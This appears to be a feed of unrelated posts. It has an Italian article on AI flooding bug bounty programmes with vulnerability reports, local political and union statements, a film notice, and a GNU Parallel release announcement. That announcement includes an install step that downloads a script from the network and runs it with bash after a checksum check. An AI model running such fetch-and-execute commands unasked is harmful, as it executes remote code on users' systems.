Fino a oggi, il tempo necessario per realizzare il codice che sfrutta una falla di sicurezza per portare un attacco era, nella maggior parte dei casi, di settimane o al massimo di qualche giorno. Un margine sufficiente perché gli aggiornamenti venissero distribuiti. Di conseguenza, il rischio che qualcuno rimanesse “scoperto” era relativamente basso.
A causa degli strumenti basati su intelligenza artificiale generativa, però, le cose sono cambiate. Utilizzando l’AI è possibile realizzare un exploit con una velocità prima impensabile. Secondo i ricercatori di sicurezza Efi Weiss e Nahman Khayet, autori di un progetto dedicato, per creare un exploit con l’AI partendo da una vulnerabilità nota sarebbero sufficienti anche solo 15 minuti.
Lo scorso 7 aprile, un comunicato ufficiale di Anthropic ha scosso il settore della cybersecurity. Oggetto dell’annuncio era il nuovo large language model Claude Mythos Preview, che gli sviluppatori dell’azienda californiana hanno sostanzialmente classificato come uno strumento troppo pericoloso per essere distribuito pubblicamente. Il motivo? Il nuovo LLM sarebbe in grado di individuare vulnerabilità all’interno dei software con un’efficacia senza precedenti. Rilasciarlo pubblicamente, di conseguenza, sarebbe troppo rischioso.
L’azienda ha quindi deciso di avviare un progetto, battezzato con il nome di Project Glasswing, che coinvolge un numero limitato di soggetti come Microsoft, Apple, Google, AWS, Cisco, Nvidia e Linux Foundation. Qualche controindicazione, però, è emersa quasi subito. Lo stesso giorno dell’annuncio, il 7 aprile, un gruppo riunito in un forum Discord privato è riuscito ad accedere a Mythos — non con un attacco sofisticato, ma combinando le credenziali del dipendente di un fornitore terzo con un’ipotesi azzeccata sull’URL del modello. La vicenda è emersa pubblicamente circa due settimane dopo, grazie a un’inchiesta di Bloomberg. Considerato che Mythos era stato tratteggiato come una sorta di “arma fine di mondo”, con accesso soggetto a strettissime restrizioni, non si tratta proprio di un esordio rassicurante.
Al netto del sensazionalismo dell’annuncio, che secondo molti rappresenta un marchio di fabbrica del marketing di Anthropic, la vicenda di Claude Mythos Preview si inserisce in un fenomeno più ampio, che gli esperti di sicurezza informatica stanno segnalando da tempo come estremamente problematico: la crescita esponenziale del numero di vulnerabilità segnalate.
In sintesi, il problema non è tanto la possibilità che i gruppi dediti al cyber crimine riescano a sfruttare gli LLM avanzati per individuare nuove vulnerabilità zero-day (falle di sicurezza ancora sconosciute), quanto il fatto che l’implementazione di strumenti automatizzati per l’analisi dei software sta generando troppe segnalazioni rispetto a quelle che gli sviluppatori sono in grado di gestire.
Una cosa, infatti, è individuare una falla. Un’altra è correggere il codice per eliminare il rischio che la vulnerabilità venga sfruttata per portare un attacco. Qualsiasi aggiornamento di un software o – a maggior ragione – di un sistema operativo richiede infatti una serie di verifiche e test per validarne l’efficacia e, non ultimo, escludere eventuali conflitti o “effetti collaterali” indesiderati nel suo funzionamento. Insomma: rimediare a una vulnerabilità richiede più impegno e più tempo rispetto a sfruttarla per scopi malevoli.
A livello intuitivo, si potrebbe pensare che questo squilibrio tra il numero di segnalazioni e la capacità di elaborarne il contenuto possa avere come conseguenza un semplice rallentamento delle operazioni. Non è così.
Per prassi consolidata, infatti, il processo di responsible disclosure prevede che al destinatario della segnalazione sia concesso un termine – solitamente di 60-90 giorni – entro il quale deve rilasciare l’aggiornamento. Trascorso il termine, chi ha inviato la segnalazione è autorizzato a rendere pubblici i dettagli della vulnerabilità.
Si tratta di un accorgimento che ha un duplice obiettivo. Il primo è quello di evitare che lo sviluppatore possa “snobbare” la segnalazione, anche solo per negare il meritato compenso del ricercatore che l’ha effettuata. La seconda è quella di ridurre il rischio che qualcun altro scopra la falla o che questa diventi pubblica per un qualsiasi motivo prima che l’aggiornamento sia disponibile.
Anche se piuttosto rari, in passato si sono verificati casi in cui gli sviluppatori non sono riusciti a rispettare la scadenza e si sono trovati di fronte a una pubblicazione dei dettagli di una vulnerabilità quando non avevano ancora preso le dovute contromisure. Nel nuovo scenario, in cui le segnalazioni piovono a una velocità impressionante, rispettare le scadenze rischia di diventare molto più difficile.
La cronaca recente conferma tutti i timori legati al massiccio impiego dell’AI nell’individuazione delle vulnerabilità. La società di cybersecurity HackerOne ha sospeso il suo programma Internet Bug Bounty (IBB), attività finanziata in crowdfunding che gestisce dal 2013. Il motivo? L’eccessivo numero di segnalazioni stava mettendo in difficoltà chi ha il compito di correggere il codice del software. E questo soprattutto in ambito open source, dove la gestione dei progetti è spesso affidata a programmatori che prestano la loro opera a titolo volontario.
La pagina web di HackerOne è un perfetto riassunto dei problemi che vive il settore. Nelle sue policy, spiega che ricompenserà solo quelle vulnerabilità che “siano state segnalate in modo responsabile, riconosciute, analizzate (triage), risolte e divulgate tramite un Security Advisory o una CVE (Common Vulnerabilities and Exposures, un sistema di catalogazione pubblico e standardizzato delle vulnerabilità di sicurezza informatica note – ndR). Se una vulnerabilità viene segnalata da più persone ed è riconosciuta all’interno del security advisory, solo il primo segnalatore (come identificato dai maintainer del progetto) avrà diritto alla ricompensa”.
In questo passaggio si leggono tutte le criticità legate a un ecosistema che è ormai andato fuori controllo. Traducendo dal “politically correct” adottato nelle policy, HackerOne ammette di trovarsi in una situazione in cui vengono segnalate vulnerabilità che non sono state sufficientemente approfondite, che in molti casi vengono scovate da più soggetti e per le quali non viene fornita una soluzione. Insomma: si trova ad avere a che fare con troppo “pattume” generato dall’AI. Motivazioni simili hanno indotto la piattaforma Bugcrowd a introdurre una serie di regole e restrizioni per contrastare il fenomeno che hanno battezzato come “sloptimism” (segnalazioni basate su AI inviate con troppa fiducia e poca verifica).
Guardando più nel dettaglio il fenomeno, emerge anche un altro dato. A gennaio 2026 i volontari che gestiscono cURL – software open source che gestisce lo scambio di dati con Internet e che, pur sconosciuto al grande pubblico, è installato in miliardi di dispositivi (telefoni, automobili, TV) – hanno annunciato che dal mese successivo avrebbero smesso di accettare segnalazioni tramite HackerOne. In un aggiornamento pubblicato ad aprile, il creatore Daniel Stenberg ha diffuso un grafico da cui emerge una tendenza abbastanza chiara: nonostante da febbraio non sia stata accettata alcuna segnalazione, il totale del 2026 era già arrivato a 87.
Al di là della crescita esponenziale di segnalazioni, spicca il fatto che nel 2025 sono stati registrati numerosi report classificati come “likely AI slop” (probabile pattume AI), cioè vulnerabilità di bassissimo impatto o inventate dall’intelligenza artificiale. Il loro numero, però, è diminuito percentualmente nel corso dell’anno successivo.
Prima di considerare questi dati come confortanti, è però opportuno considerare un altro aspetto: non tutte le vulnerabilità validate rappresentano un reale rischio di sicurezza. Come spiega Naz Bozdemir in un post sul blog di HackerOne, delle 22 vulnerabilità individuate da Claude Opus 4.6 nel codice di Mozilla Firefox – 14 delle quali ad alta gravità – soltanto due si sono rivelate effettivamente sfruttabili per costruire un exploit. In altre parole: erano tutte difetti reali, ma solo due rappresentavano un rischio imminente e concreto.
L’idea che una maggiore efficienza porti automaticamente a più sicurezza, alla fine, si sta rivelando un’illusione. L’uso intensivo dell’AI sta dimostrando esattamente il contrario: senza la capacità di selezionare, comprendere e intervenire, rischia di generare semplicemente caos.
L'articolo La fine del bug bounty? proviene da Guerre di Rete.
In occasione dell’80º anniversario della Repubblica italiana e del voto alle donne, ISTORECO, insieme ad ANPI, ANPPIA, ANED e al Cinema Teatro 4 Mori, invita la cittadinanza alla proiezione del film C’è ancora domani di Paola Cortellesi, che si terrà lunedì 1 giugno 2026 alle ore 21 presso il Cinema Teatro
4 Mori di Livorno con ingresso gratuito.
C’è ancora domani racconta, con forza e sensibilità, la condizione femminile nell’Italia del dopoguerra con una narrazione incentrata su una figura del popolo vessata in famiglia dall’atteggiamento arrogante e violento del marito e del suocero, due esemplari del peggiore, ed ancora attuale, patriarcato. Il marito non desidera che la moglie vada a votare e la protagonista si organizza per esercitare questo nuovo diritto. Prima tappa di un lungo cammino verso il riconoscimento dei diritti, da quello del voto, a quello della parità salariale per eguale lavoro, a quello dell’aborto, così come il diritto di ricoprire qualsiasi ruolo nell’ amministrazione dello Stato.
Riproporlo significa sollecitare una riflessione su quanto quella conquista abbia trasformato il Paese e su quanto ancora sia necessario impegnarsi per una piena ed egualitaria cittadinanza democratica.
La serata sarà introdotta dai saluti delle autorità e dal Presidente di ISTORECO, Claudio Massimo Seriacopi. Seguiranno un intervento di Catia Sonetti, Direttrice di ISTORECO, e della Prof.ssa Chiara Tognolotti, storica del cinema (Università di Pisa).
Fonte foto: Wikimedia Commons, https://upload.wikimedia.org/wikipedia/commons/3/3e/Panorama_porto_di_piombino.JPG?utm_source=it.wikipedia.org&utm_campaign=index&utm_content=original
Oggi la nostra città si è risvegliata con una bella notizia: le istituzioni di Piombino hanno formalmente cominciato a prendere posizione contro la crescita delle attività di carico e scarico di armi, mezzi militari ed altro materiale ad uso bellico nel nostro porto. La votazione favorevole del Consiglio Comunale di una mozione chiara e netta al riguardo (mozione presentata dai consiglieri di Rifondazione Comunista Fabrizio Callaioli e Dario Filippi, che ci teniamo a ringraziare) rappresenta senza dubbio un passo avanti, un passaggio figlio di un lungo percorso e che dovrà accompagnare una lotta che non è ovviamente finita.
Diverse realtà cittadine (tra cui anche il nostro sindacato e ovviamente il gruppo delle Donne in Nero) si sono lungamente spese perché la politica cittadina prendesse posizione e si attivasse concretamente contro il progressivo scivolare delle attività portuali verso l'ambito militare. Il voto di ieri dimostra che non è vero che lottare e protestare non serve a niente. Un comunicato, una manifestazione, un convegno, se isolati, spostano ben poco. Se uniti e capaci di durare nel tempo, possono invece riuscire a far pressione sulle istituzioni e a smuoverle. Una piccola ma utile lezione che pensiamo possa tornare utile anche rispetto a molti altri terreni di lotta.
Per parte nostra, consideriamo il voto di ieri anche un frutto positivo dell'aver lavorato affinché l'opposizione ai movimenti di armi nel porto non andasse separata da quella contro il rigassificatore, riuscendo a portare questa saldatura di lotte anche nella manifestazione cittadina dell'11 aprile scorso.
Né a Piombino né altrove
Le ragioni per opporsi al carico e scarico di armi (che siano per esercitazioni o che siano dirette verso veri e propri scenari di guerra, come nel caso della nave partita da Piombino lo scorso 30 marzo e diretta verso l'Arabia Saudita) indicate dalla mozione, sono lo stesse che come USB sosteniamo da tempo, sia a livello nazionale che in relazione al contesto di Piombino. Motivi etici e politici generali innanzitutto. Motivi di sicurezza per i lavoratori e la città, vista anche la vicina presenza del rigassificatore, (peraltro potenziale obiettivi sensibile in caso di guerra). Ma anche specificamente legati alla crisi economica e produttiva del nostro territorio. Non è un caso che l'Esercito Italiano e il Ministero della Difesa sembrino intenzionati a rendere Piombino un Hub militare. Un contesto sociale sofferente, segnato da disoccupazione e cassa integrazione si traduce in una popolazione più ricattabile e in un territorio sacrificabile, a cui si può propinare di tutto in cambio di una manciata anche piccola di posti di lavoro. E infatti dopo la discarica e dopo il rigassificatore abbiamo avuto anche la logistica della guerra. Così non si può andare avanti.
Per noi continua ad essere cruciale capire che o si interrompe questa spirale di ricatto e di declino, pretendendo dalla politica scelte opposte e coraggiose (come la nazionalizzazione delle acciaierie, ad esempio), o il prezzo da pagare sarà sempre più alto. E che solo una mobilitazione reale e sentita da parte di lavoratori e cittadini, con l'appoggio di forze sociali e politiche solidali e determinate può allontanare questa brutta prospettiva.
Dire No alla militarizzazione del porto di Piombino significa per noi tenere aperta la possibilità di un vero rilancio e potenziamento della sua funzione civile e commerciale, la sola che può garantire vere ricadute positive in termini di sviluppo economico e di posti di lavoro. Dire No alla logistica e all'economia della guerra significa cioè stare dalla parte di Piombino e del suo diritto al futuro.
Non ci illudiamo e invitiamo a non illudersi. Molto è ancora da fare per ostacolare e e interrompere il va e vieni di queste navi. Ma la mozione approvata ieri è un piccolo strumento in più a disposizione di chi vorrà tentare di farlo, sapendo che altrove questo è stato già possibile. Dimostrare con sempre maggiore incisività che Piombino rifiuta di diventare un Hub militare è la difficile sfida che abbiamo davanti, sfida a cui non ci sottrarremo.
USB Piombino

GNU Parallel 20260522 ('Hantavirus') has been released. It is available for download at: lbry://@GnuParallel:4
Quote of the month:
...and GNU Parallel is fun.
-- DJviolin@reddit
New in this release:
GNU Parallel - For people who live life in the parallel lane.
If you like GNU Parallel record a video testimonial: Say who you are, what you use GNU Parallel for, how it helps you, and what you like most about it. Include a command that uses GNU Parallel if you feel like it.
GNU Parallel is a shell tool for executing jobs in parallel using one or more computers. A job can be a single command or a small script that has to be run for each of the lines in the input. The typical input is a list of files, a list of hosts, a list of users, a list of URLs, or a list of tables. A job can also be a command that reads from a pipe. GNU Parallel can then split the input and pipe it into commands in parallel.
If you use xargs and tee today you will find GNU Parallel very easy to use as GNU Parallel is written to have the same options as xargs. If you write loops in shell, you will find GNU Parallel may be able to replace most of the loops and make them run faster by running several jobs in parallel. GNU Parallel can even replace nested loops.
GNU Parallel makes sure output from the commands is the same output as you would get had you run the commands sequentially. This makes it possible to use output from GNU Parallel as input for other programs.
For example you can run this to convert all jpeg files into png and gif files and have a progress bar:
parallel --bar convert {1} {1.}.{2} ::: *.jpg ::: png gif
Or you can generate big, medium, and small thumbnails of all jpeg files in sub dirs:
find . -name '*.jpg' |
parallel convert -geometry {2} {1} {1//}/thumb{2}_{1/} :::: - ::: 50 100 200
You can find more about GNU Parallel at: http://www.gnu ... rg/s/parallel/
You can install GNU Parallel in just 10 seconds with:
$ (wget -O - pi.dk/3 || lynx -source pi.dk/3 || curl pi.dk/3/ || \
fetch -o - http://pi.dk/3 ) > install.sh
$ sha1sum install.sh | grep c555f616391c6f7c28bf938044f4ec50
12345678 c555f616 391c6f7c 28bf9380 44f4ec50
$ md5sum install.sh | grep 707275363428aa9e9a136b9a7296dfe4
70727536 3428aa9e 9a136b9a 7296dfe4
$ sha512sum install.sh | grep b24bfe249695e0236f6bc7de85828fe1f08f4259
83320d89 f56698ec 77454856 895edc3e aa16feab 2757966e 5092ef2d 661b8b45
b24bfe24 9695e023 6f6bc7de 85828fe1 f08f4259 6ce5480a 5e1571b2 8b722f21
$ bash install.sh
Watch the intro video on http://www.youtub ... L284C9FF2488BC6D1
Walk through the tutorial (man parallel_tutorial). Your command line will love you for it.
When using programs that use GNU Parallel to process data for publication please cite:
O. Tange (2018): GNU Parallel 2018, March 2018, https://doi.org/1 ... 81/zenodo.1146014.
If you like GNU Parallel:
If you use programs that use GNU Parallel for research:
If GNU Parallel saves you money:
GNU sql aims to give a simple, unified interface for accessing databases through all the different databases' command line clients. So far the focus has been on giving a common way to specify login information (protocol, username, password, hostname, and port number), size (database and table size), and running queries.
The database is addressed using a DBURL. If commands are left out you will get that database's interactive shell.
When using GNU SQL for a publication please cite:
O. Tange (2011): GNU SQL - A Command Line Tool for Accessing Different Databases Using DBURLs, ;login: The USENIX Magazine, April 2011:29-32.
GNU niceload slows down a program when the computer load average (or other system activity) is above a certain limit. When the limit is reached the program will be suspended for some time. If the limit is a soft limit the program will be allowed to run for short amounts of time before being suspended again. If the limit is a hard limit the program will only be allowed to run when the system is below the limit.
Un altro operaio ucciso.
Un altro lavoratore che esce di casa e non ci torna più.
A Spianate, in provincia di Lucca, un operaio di 31 anni è morto schiacciato da una pressa dentro la ditta Cora Srl.
Non chiamatele morti bianche. Non chiamatele fatalità.
Non chiamatele tragiche coincidenze.
Questi sono omicidi sul lavoro.
Sono il prodotto di un sistema fondato sul profitto, sulla compressione dei costi, sulla riduzione della sicurezza a semplice variabile economica. In questo sistema i lavoratori vengono trattati come numeri, ingranaggi sostituibili, costi da abbattere per aumentare margini e produttività.
Ogni volta ci raccontano la stessa storia: si accerteranno le responsabilità, era un bravo lavoratore, si parla di “cordoglio”. Poi tutto continua come prima. Turni massacranti, appalti, precarietà, ritmi insostenibili, manutenzioni rimandate, formazione insufficiente, controlli inesistenti.
La verità è che queste morti vengono messe in conto.
Perché investire davvero in sicurezza costa.
E nel capitalismo italiano la vita di un operaio vale meno di un bilancio aziendale.
Mentre governo e padroni parlano di competitività e crescita, nei luoghi di lavoro si continua a morire. I profitti aumentano, i salari crollano, i diritti vengono smantellati e chi lavora paga con il sangue.
Noi diciamo basta.
Serve l’introduzione immediata del reato di OMICIDIO SUL LAVORO per imprenditori, dirigenti e responsabili che, violando norme e obblighi di sicurezza, causano la morte di lavoratrici e lavoratori.
Chi risparmia sulla sicurezza deve pagare penalmente.
Chi sfrutta deve rispondere delle proprie responsabilità.
Chi considera la vita operaia sacrificabile deve essere colpito duramente.
Non ci uniamo al coro dell’ipocrisia istituzionale.
La responsabilità politica è di governi che da anni smantellano controlli, favoriscono precarietà e obbediscono agli interessi delle imprese. La responsabilità morale è di un sistema economico che pretende produttività infinita e accetta la morte come prezzo normale del profitto.
Finché il profitto verrà prima della vita, continueremo a contare i morti.
E noi continueremo a stare dalla parte dei lavoratori contro questo sistema marcio, costruito sullo sfruttamento, sulla precarietà e sul sacrificio quotidiano di chi produce ricchezza e viene ripagato con salari da fame e bare.
Non abbiamo nulla da condividere con chi si arricchisce sulla pelle degli operai.
Nessuna pace sociale con padroni e governi complici di questa strage continua.
Ogni lavoratore ucciso dal profitto pesa sulle coscienze di chi difende questo modello economico fondato sullo sfruttamento e sull’impunità.
La nostra rabbia non si spegne con le parole di circostanza.
La nostra risposta sarà organizzazione, lotta e conflitto.
Perché chi lavora ha diritto a vivere.
E chi trasforma i luoghi di lavoro in luoghi di morte deve essere chiamato con il suo nome: responsabile di un omicidio sul lavoro.

